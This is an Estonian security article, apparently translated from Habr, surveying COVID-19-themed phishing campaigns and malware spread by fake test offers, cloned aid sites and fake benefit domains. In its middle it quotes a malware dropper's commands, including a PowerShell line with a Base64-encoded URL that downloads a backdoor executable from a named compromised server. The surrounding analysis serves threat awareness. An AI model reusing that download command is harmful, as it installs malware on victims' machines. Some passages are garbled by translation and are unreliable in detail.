Ründajad jätkavad COVID-19 teema ärakasutamist, tekitades üha uusi ohte kasutajatele, kes on kõigest epideemiaga seonduvast väga huvitatud. IN Oleme juba rääkinud, millist tüüpi pahavara koroonaviiruse järel ilmus, ja täna räägime sotsiaalse manipuleerimise tehnikatest, millega erinevate riikide, sealhulgas Venemaa kasutajad on juba kokku puutunud. Üldised trendid ja näited on all.
Pidage meeles Rääkisime sellest, et inimesed on valmis lugema mitte ainult koroonaviiruse ja epideemia käigust, vaid ka rahaliste toetusmeetmete kohta? Siin on hea näide. Saksamaal Nordrhein-Westfaleni liidumaal ehk NRW-s avastati huvitav andmepüügirünnak. Ründajad lõid koopiad majandusministeeriumi veebisaidilt (), kus igaüks saab taotleda rahalist abi. Selline programm on tegelikult olemas ja see osutus petturitele kasulikuks. Saanud ohvrite isikuandmed, tegid nad avalduse pärisministeeriumi kodulehel, kuid märkisid ära muud pangaandmed. Ametlikel andmetel tehti selliseid võltstaotlusi kuni skeemi avastamiseni 4 tuhat. Selle tulemusena sattus petturite kätte 109 miljonit dollarit, mis oli mõeldud mõjutatud kodanikele.
Kas soovite tasuta COVID-19 testi teha?
Teine märkimisväärne näide koroonaviiruse-teemalisest andmepüügist oli meilides. Sõnumid äratasid kasutajate tähelepanu pakkumisega läbida tasuta koronaviiruse nakkuse testid. Nende manusena oli juhtumeid Trickbot/Qakbot/Qbot. Ja kui tervisekontrolli soovijad hakkasid "lisatud vormi täitma", laaditi arvutisse pahatahtlik skript. Ja liivakasti testimise vältimiseks hakkas skript peamist viirust alla laadima alles mõne aja pärast, kui kaitsesüsteemid olid veendunud, et pahatahtlikku tegevust ei toimu.
Enamiku kasutajate veenmine makrosid lubama oli samuti lihtne. Selleks kasutati tavalist nippi: küsimustiku täitmiseks tuleb esmalt lubada makrod, mis tähendab, et tuleb käivitada VBA skript.
Nagu näete, on VBA skript spetsiaalselt viirusetõrjete eest varjatud.
Windowsil on ootefunktsioon, kus rakendus ootab /T <sekundit>, enne kui nõustub vaikevastusega "Jah". Meie puhul ootas skript 65 sekundit enne ajutiste failide kustutamist:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Ja oodates laaditi alla pahavara. Selle jaoks käivitati spetsiaalne PowerShelli skript:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Pärast Base64 väärtuse dekodeerimist laadib PowerShelli skript Saksamaalt alla varem häkitud veebiserveris asuva tagaukse:
http://automatischer-staubsauger.com/feature/777777.pngja salvestab selle nime all:
C:UsersPublictmpdirfile1.exe
Kaust ‘C:UsersPublictmpdir’ kustutatakse käsku sisaldava faili 'tmps1.bat' käivitamisel cmd /c mkdir ""C:UsersPublictmpdir"".
Suunatud rünnak valitsusasutuste vastu
Lisaks teatasid FireEye analüütikud hiljuti sihipärasest APT32 rünnakust, mis oli suunatud Wuhani valitsusstruktuuridele ja Hiina hädaolukordade lahendamise ministeeriumile. Üks levitatud RTF-idest sisaldas linki New York Timesi artiklile pealkirjaga . Selle lugemisel laaditi aga alla pahavara (FireEye analüütikud tuvastasid eksemplari kui METALJACK).
Huvitav on see, et Virustotali andmetel ei tuvastanud ükski viirusetõrje seda juhtumit tuvastamise ajal.
Kui ametlikud veebisaidid on maas
Kõige ilmekam näide andmepüügirünnakust juhtus Venemaal just üleeile. Selle põhjuseks oli kauaoodatud hüvitise määramine lastele vanuses 3-16 aastat. Kui 12. mail 2020 teatati taotluste vastuvõtmise algusest, tormasid miljonid riigiteenistuse veebisaidile kauaoodatud abi otsima ja tõid portaali alla mitte hullemini kui professionaalne DDoS-rünnak. Kui president ütles, et "riigiteenistused ei saa taotluste vooluga hakkama", hakati veebis rääkima alternatiivse taotluste vastuvõtmise saidi käivitamisest.
Probleem on selles, et mitu saiti hakkas korraga tööle ja kuigi üks, päris sait aadressil posobie16.gosuslugi.ru, võtab taotlusi vastu, .
SearchInformi kolleegid leidsid .ru tsoonist umbes 30 uut petudomeeni. Infosecurity ja Softline Company on alates aprilli algusest jälginud enam kui 70 sarnast võltsitud riigiteenuste veebisaiti. Nende loojad manipuleerivad tuttavate sümbolitega ja kasutavad ka kombinatsioone sõnadest gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie jne.
Hüpe ja sotsiaalne manipuleerimine
Kõik need näited vaid kinnitavad, et ründajad on koronaviiruse teemaga edukalt raha teeninud. Ja mida suurem on sotsiaalne pinge ja ebaselgemad probleemid, seda suurem on võimalus petturitel varastada olulisi andmeid, sundida inimesi iseseisvalt oma rahast loobuma või lihtsalt rohkem arvuteid häkkima.
Ja arvestades, et pandeemia on sundinud potentsiaalselt ettevalmistamata inimesi massiliselt kodus töötama, on ohus mitte ainult isiklikud, vaid ka ettevõtte andmed. Näiteks hiljuti sattusid andmepüügirünnaku alla ka Microsoft 365 (endine Office 365) kasutajad. Inimesed said kirjade manustena massiliselt "vastamata" häälsõnumeid. Kuid failid olid tegelikult HTML-leht, mis saatis rünnaku ohvrid . Selle tulemusena kaotatakse juurdepääs ja kõik konto andmed on ohus.
Allikas: www.habr.com